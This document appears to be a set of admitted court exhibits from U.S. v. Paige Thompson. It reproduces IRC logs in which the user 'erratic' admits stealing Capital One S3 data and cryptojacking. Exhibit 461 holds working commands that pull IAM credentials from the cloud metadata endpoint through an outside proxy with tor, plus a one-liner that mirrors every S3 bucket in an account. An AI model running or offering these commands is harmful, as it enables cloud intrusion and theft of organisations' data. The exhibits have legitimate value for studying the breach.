(09:34:53 PM) **netcrave**: <paigeadele> the schemas might be diff but they seem similiar enough if that makes any sense ..

(09:36:54 PM) **netcrave**: <paigeadele> itd be nice if the exception would tell us which file has the fucked up schema

(09:39:12 PM) **netcrave**: <paigeadele> https://termbin.com/ioh2 https://termbin.com/uqhp https://termbin.com/o3mc

(09:40:59 PM) **netcrave**: <paigeadele> in my mind like this all should be trivial

(09:41:11 PM) **netcrave**: <paigeadele> so maybe theres a library we need to add to the cluster to do that

(09:43:33 PM) **netcrave**: <paigeadele> https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction

(09:46:54 PM) **netcrave**: <paigeadele> https://azure.microsoft.com/en-us/features/storage-explorer/https://azure.microsoft.com/en-us/features/storage-explorer/

(09:59:23 PM) **netcrave**: <paigeadele>

(09:59:34 PM) **netcrave**: <paigeadele> installing microsoft shit on my lovely linux os

(10:00:02 PM) **netcrave**: <paigeadele> has to update a bunch of shit

(10:00:38 PM) **netcrave**: <paigeadele> I have a bunch of snapshots I need to delete at some point

(10:08:58 PM) **netcrave**: <paigeadele> ugh this is taking for fucking ever

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-06-23.091802-0700PDT.html | 6/23/2019 8:46 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-23.152301-0700PDT.html | 6/23/2019 6:03 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-23.190121-0700PDT.html | 6/23/2019 7:27 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-23.202750-0700PDT.html | 6/24/2019 8:00 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-24.090019-0700PDT.html | 6/24/2019 9:25 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-24.102509-0700PDT.html | 6/25/2019 5:49 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.064922-0700PDT.html | 6/25/2019 6:03 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.065249-0700PDT.html | 6/25/2019 6:11 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.071058-0700PDT.html | 6/25/2019 7:59 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.085954-0700PDT.html | 6/25/2019 8:38 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.093810-0700PDT.html | 6/25/2019 1:19 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.141955-0700PDT.html | 6/25/2019 2:17 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.151738-0700PDT.html | 6/25/2019 3:22 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.162214-0700PDT.html | 6/25/2019 5:30 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.183051-0700PDT.html | 6/25/2019 6:17 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-26.095308-0700PDT.html | 6/26/2019 1:18 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-26.141805-0700PDT.html | 6/26/2019 4:41 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-26.174106-0700PDT.html | 6/27/2019 8:51 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.095143-0700PDT.html | 6/27/2019 10:59 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.115908-0700PDT.html | 6/27/2019 2:46 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.154625-0700PDT.html | 6/27/2019 8:18 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.211824-0700PDT.html | 6/27/2019 10:06 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.230610-0700PDT.html | 6/28/2019 12:19 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-28.131910-0700PDT.html | 6/28/2019 4:04 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-28.170422-0700PDT.html | 6/28/2019 6:24 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-28.192444-0700PDT.html | 6/28/2019 10:30 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-28.233045-0700PDT.html | 6/29/2019 6:25 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-29.192531-0700PDT.html | 6/29/2019 8:23 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.131057-0700PDT.html | 6/30/2019 12:56 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.142755-0700PDT.html | 6/30/2019 4:19 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.171859-0700PDT.html | 6/30/2019 4:29 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.172918-0700PDT.html | 6/30/2019 4:40 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.174002-0700PDT.html | 7/1/2019 8:49 AM | Firefox HTML Doc... | 4 KB |
| 2019-07-01.094952-0700PDT.html | 7/1/2019 10:46 AM | Firefox HTML Doc... | 4 KB |
| 2019-07-01.114630-0700PDT.html | 7/1/2019 2:25 PM | Firefox HTML Doc... | 4 KB |
| 2019-07-01.152540-0700PDT.html | 7/1/2019 4:53 PM | Firefox HTML Doc... | 4 KB |
| 2019-07-01.175356-0700PDT.html | 7/1/2019 6:01 PM | Firefox HTML Doc... | 4 KB |
| 2019-07-02.193811-0700PDT.html | 7/3/2019 9:09 PM | Firefox HTML Doc... | 20 KB |
| 2019-07-03.225307-0700PDT.html | 7/4/2019 12:24 PM | Firefox HTML Doc... | 12 KB |
| 2019-07-04.132409-0700PDT.html | 7/4/2019 3:25 PM | Firefox HTML Doc... | 4 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 458
Admitted_____



s/IRC Chats from 1B2/.purple/.purple/logs/irc/erratic@localhost/%23netcrave.chat/2019-07-03.225307-0700PDT.html ▽ C   Search

Most Visited   Getting Started

(03:11:06 AM) **netcrave:** <paigeadele> how fucked up is that

(09:24:36 AM) **netcrave:** <paigeadele> @jillianlenox have you heard of parquet ~/.local/bin/parq --tail 100 asvsbclinemanagement-us-east-1/clip-gotoline-smallbusiness-internal/20190222080106/part-00001-5cd94b04-7c4a-42ce-ba72-b99fa363a825-c000.snappy.parquet

(09:25:18 AM) **netcrave:** <paigeadele> this dealie https://parquet.apache.org/

(09:40:13 AM) **netcrave:** <paigeadele>

(10:39:24 AM) **netcrave:** <jillianlenox> woah i just felt an earthquake

(12:59:18 PM) **The account has disconnected and you are no longer in this chat. You will automatically rejoin the chat when the account reconnects.**

458-002

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ EFNet ▸ #lrh

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-07-14.log | 7/14/2019 9:00 PM | Text Document | 354 KB |
| 2019-07-15.log | 7/15/2019 8:55 PM | Text Document | 364 KB |
| 2019-07-16.log | 7/16/2019 6:39 PM | Text Document | 295 KB |
| 2019-07-18.log | 7/18/2019 8:59 PM | Text Document | 372 KB |
| 2019-07-19.log | 7/19/2019 8:59 PM | Text Document | 1,589 KB |
| 2019-07-20.log | 7/20/2019 9:00 PM | Text Document | 496 KB |
| 2019-07-21.log | 7/21/2019 8:59 PM | Text Document | 469 KB |
| 2019-07-22.log | 7/22/2019 9:00 PM | Text Document | 518 KB |
| 2019-07-23.log | 7/23/2019 7:30 PM | Text Document | 355 KB |
| 2019-07-25.log | 7/25/2019 9:00 PM | Text Document | 346 KB |
| 2019-07-26.log | 7/26/2019 7:10 PM | Text Document | 574 KB |
| 2019-07-27.log | 7/27/2019 9:00 PM | Text Document | 352 KB |
| 2019-07-28.log | 7/28/2019 9:00 PM | Text Document | 301 KB |
| 2019-07-29.log | 7/29/2019 1:21 PM | Text Document | 160 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 459
Admitted_____

📄 2019-07-14.log ❌

```
663   [07:54:12] <erratic> lol
664   [07:56:30] <erratic> kongfuzi: you got a place I can upload 2.2TB of stuff
665   [07:56:52] <erratic> I cant really talk about what it is or how I got it
666   [07:56:58] <erratic> its just stuff
667   [07:57:05] <erratic> you know how it goes
```

IRC Chats from 1B52 - md126 ▶ .znc ▶ moddata ▶ log ▶ erratic ▶ EFNet ▶ raborn

| Name | Date modified | Type |
|------|---------------|------|
| 📄 2019-07-15.log | 7/15/2019 12:19 PM | Text Document |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 460
Admitted_____

📄 2019-07-15.log ☒

```
 1  [09:33:28] <erratic> do you mean to say I have unreasonable expectations in life and that I should just
    settle for ? whatever life I have
 2  [09:45:58] <Raborn> No?
 3  [09:46:18] <Raborn> I mean allowing someone to enter illegally is being a traitor
 4  [09:47:30] <erratic> its true, I am a traitor
 5  [09:47:47] <erratic> for a lot of other reasons than that
 6  [09:47:49] <erratic> lol
 7  [09:48:13] <erratic> but
 8  [09:48:40] <erratic> its ok
 9  [09:48:47] <erratic> I know what you're saying
10  [09:53:50] <erratic> https://eth.nanopool.org/account/0x36f39c24c99a1b49a45c191bb8ae8622941491b3 Im a crook
    too
11  [09:55:35] <erratic> Im a lot of things that just arent really conducive to ... whatever
12  [09:55:50] <erratic> I stopped giving a fuck
13  [09:58:21] <erratic> life doesn't incentivize giving a fuck enough
14  [10:02:10] <erratic> this isnt the only address I use either I have about 20 others that have active nodes
15  [10:02:11] <erratic> lol
16  [10:02:20] <erratic> thats fucked up isn't it
17  [10:03:15] <erratic> dude Ive been really careless about this
18  [10:03:23] <erratic> I really can't believe
19  [10:03:35] <erratic> actually I can and I cant
20  [10:04:29] <erratic> people still get paid to do IT, and they should be protecting their assets better than
    they are
21  [10:05:05] <erratic> people that I'm 1,000x more qualified than
22  [10:05:47] <erratic> and I know its bullshit and this is just proof of that
23  [10:06:23] <erratic> but why do I have to fuckin be the one who's trying to go to jail for wire fraud, to
    prove their qualified enough to have a job?
24  [10:06:38] <erratic> why does anybody need to be reduced to this at all?
25  [10:07:13] <erratic> talk about infidelity
26  [10:09:23] <erratic> but yeah man I donno remember I was telling you about this yea well, I have money I get
    paid now regardless, did you think that I was really just mentally ill and making this up ?
27  [10:10:22] <erratic> I mean I probably would tbh, I'd have a lot of doubts about anything I said but thats
    just me, but Im actually doing this and this really is what I've been reduced to
28  [10:11:47] <erratic> I have like 1tb of capitol one's s3 buckets
29  [10:12:17] <erratic> thats not all, but of the s3 bucket scrapes thats prob the most egregious
30  [10:12:25] <erratic> lol
31  [10:12:46] <erratic> Im actually afraid
32  [10:12:58] <erratic> I havne't leaked it but if you haven't been paying attention,
33  [10:13:13] <erratic>
    https://www.scmagazine.com/home/security-news/magecart-group-compromises-17000-domains-by-overwriting-amazon-s3
    -buckets/
34  [10:14:13] <erratic> thats not my claim but that hits really close to home
35  [10:15:41] <erratic> ". This technique is possible because of the misconfigured permissions on the S3 bucket,
    which grants the write permission to anyone."
36  [10:16:37] <erratic> dude like thats not why, you could but its impractical to have granular-enough
    permissions as a single solution to the problem
37  [10:16:42] <erratic> thats all Im gonna say xD
38  [10:18:12] <erratic> its so fucking stupid, the number 1 thing that is fucking people over is so trivial and
    if the people implementing it actually cared.... it wouldn't be a problem
39  [10:19:00] <erratic> i guess to be fair, in general its not everybody but its enough that I have a 6 figure
    salary made for myself in crypto
40  [10:27:27] <erratic> my problems dont make any sense to anybody else let alone me, I wish I were not capable
    of this, I feel hazed and all I can't think about now is what's next because nothing has stopped me yet
41  [10:28:28] <erratic> I miss helping people
42  [10:30:20] <erratic> would you believe that I miss doing work that was actually helpful to people
43  [10:33:19] <erratic> . This technique is possible because of the misconfigured permissions on the S3 bucket,
    which grants the write permission to anyone."
44  [10:33:31] <erratic> sorry repaste
45  [10:35:00] <erratic> but yeah evidently nobody else believes that either, if they did I wouldn't fucking be
    in this situation and the sooner I get busted for it and make a name for myself the better because I don't
    know what more somebody could possibly expect from me if I have a criminal record for computer fraud
46  [10:35:11] <erratic> I must be pretty fucking dedicated huh?
```

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ EFNet ▸ nance

| Name | Date modified | Type |
|------|---------------|------|
| 2019-07-16.log | 7/16/2019 9:07 AM | Text Document |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 461
Admitted_____

📁 2019-07-16.log ☒

```
 1  [11:40:29] <erratic> https://termbin.com/fn8d < -- awsession.sh -- eval
    `proxychains4 curl --proxy-insecure --proxy http://54.88.121.100:3128
    http://169.254.169.254/latest/meta-data/iam/security-credentials/My-IAM-Role-Full-
    Access | sed -e 's/<[^>]*>//g' | ~/.local/bin/awsession.sh `
 2  [11:40:47] <erratic> you'll have to apt-get install tor and proxychains ..
 3  [11:40:50] <erratic> and aws-cli
 4  [11:41:12] <erratic> then you can verify it with `aws sts get-caller-identity`
 5  [11:41:30] <erratic> but you'll wanna do something like
 6  [11:41:40] <erratic> alias aws="proxychains4 aws"
 7  [11:41:48] <erratic> so that it gets torified
 8  [11:42:03] <nance> Neat!
 9  [11:42:28] <erratic> https://termbin.com/3qn7 proxychains.conf if you need it
10  [11:43:13] <erratic> yeah aws is great, except when someone steals your IAM
    instance profile that has full access to the acount :)
11  [11:43:58] <erratic> you may have to edit torrc to get it to work right
12  [11:44:00] <erratic> sec
13  [11:44:53] <erratic> yeah I dont have anything special in mine so i think all
    you gotta do is apt-get install tor && systemctl enable tor && systemctl start
    tor
14  [11:46:17] <erratic> if you wanted to scrape somebodys s3 buckets you can do ..
15  [11:46:36] <erratic> aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' |
    parallel --tag --verbose dir='"phillips/{}"' \; mkdir -p \"$\{dir\}\" '&&' cd
    \"$\{dir\}\" '&&' nice -n 19 aws s3 sync s3://{} .
16  [11:47:10] <erratic> run that in a directory like scrapes and also change the
    name phillips to whatever you want, I usually use the company name that owns the
    account...
17  [11:47:32] <erratic> lolz
18  [11:47:48] <erratic> yeah you'll need jq (apt-get install jq) for that
19  [11:47:59] <erratic> also gnu parallel (apt-get install parallel)
20  [11:48:57] <erratic> I would actually not rely on alias aws="proxychains4 aws"
    for that and rather change the two usages of aws in that 1 liner to proxychains4
    aws explicitly because the environment forks and it doesn't copy the parent
    unlessyou have set -a or something
21  [11:50:33] <erratic> that will straight up mirror all of an accounts s3 buckets
    though which you'll wanna make sure you have the diskspace for
22  [11:51:25] <nance> Interesting. I'll have to read thru this more when I get to a
    proper terminal
23  [11:51:30] <nance> Phone irc sucks
24  [11:51:32] <erratic> but yeah if you just wanna use it to learn how to do some
    shit with aws go for it its not my shit lol
25  [11:51:38] <erratic> no worries :)
26  [11:52:07] <nance> I just legit need to learn AWS and s3 for work lol
27  [11:52:30] <nance> Make the ir dev ops dudes feel threatened
28  [11:53:48] <erratic> definitely yeah go for it if you wanna use that account for
    practice, should be fine if you use tor even without Ive fucked with a lot of
    aws accounts from my own address because most people don't have a fucking clue
    how to use logging
```

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ freenode ▸ vyzo

| Name | Date modified | Type |
|------|---------------|------|
| 2019-04-21.log | 4/21/2019 4:33 PM | Text Document |
| 2019-04-22.log | 4/22/2019 1:13 AM | Text Document |
| 2019-06-05.log | 6/5/2019 4:43 AM | Text Document |
| 2019-07-28.log | 7/28/2019 4:02 AM | Text Document |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 462
Admitted_____

2019-07-28.log ☒

```
 1  [06:38:53]  Ive gone completely insane
 2  [06:39:26]  theyre gonna lock me up and throw away the key
 3  [06:39:37] <erratic> it really is for the best
 4  [06:40:23] <erratic> or Im gonna bite into something electrical
 5  [06:40:29] <erratic> high voltage
 6  [06:42:32] <erratic> loooooooooool
 7  [06:42:34] <erratic> cyta.gr
 8  [06:42:42] <erratic> is this vodafone?
 9  [06:42:59] <erratic> dude you know ive got a mirror of all of their S3 buckets :D
10  [06:43:13] <erratic> how am I not in jail
11  [06:43:21] <erratic> or an insane asylum
12  [06:43:49] <erratic> I think that someone noez and they're not doing anything to me because theyre trying to
    drive me fucking insane
13  [06:45:11] <erratic> sending packets to: 78-202-189.adsl.cyta.gr
14  [06:45:28] <erratic> lol
```

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ EFNet ▸ pcap

| Name ▴ | Date modified | Type |
|---|---|---|
| 2019-07-28.log | 7/28/2019 12:57 AM | Text Document |

📄 2019-07-28.log ❌

61  [01:33:31] <erratic> like I've straight up gone to my counselor, told her that I was hacking shit and
    stealing cpu time to mine crypto and buying new things for myself and wearing new designer clothes etc
62  [01:34:18] <erratic> "yes thats nice well everything we talk about is strictly between us ;) ;) ;)" which
    says to me "not that I believe you but I will play along"
63  [01:35:31] <erratic> its pretty funny how clueless they are Ive never spent this much time working with
    community healthcare because its usually fucking pointless to

2019-07-28.log ☒

96   [02:34:56] &lt;erratic&gt;  dude I could turn my fuckin crypto jacking op into a full fledged enterprise I just dont have the motivation

97   [02:35:30] &lt;erratic&gt; because I don't dont know how to articulate myself well enough to send an a lulzsec grade message

98   [02:36:25] &lt;erratic&gt; I've got all the tools that I need to take on some worthy shit

462-005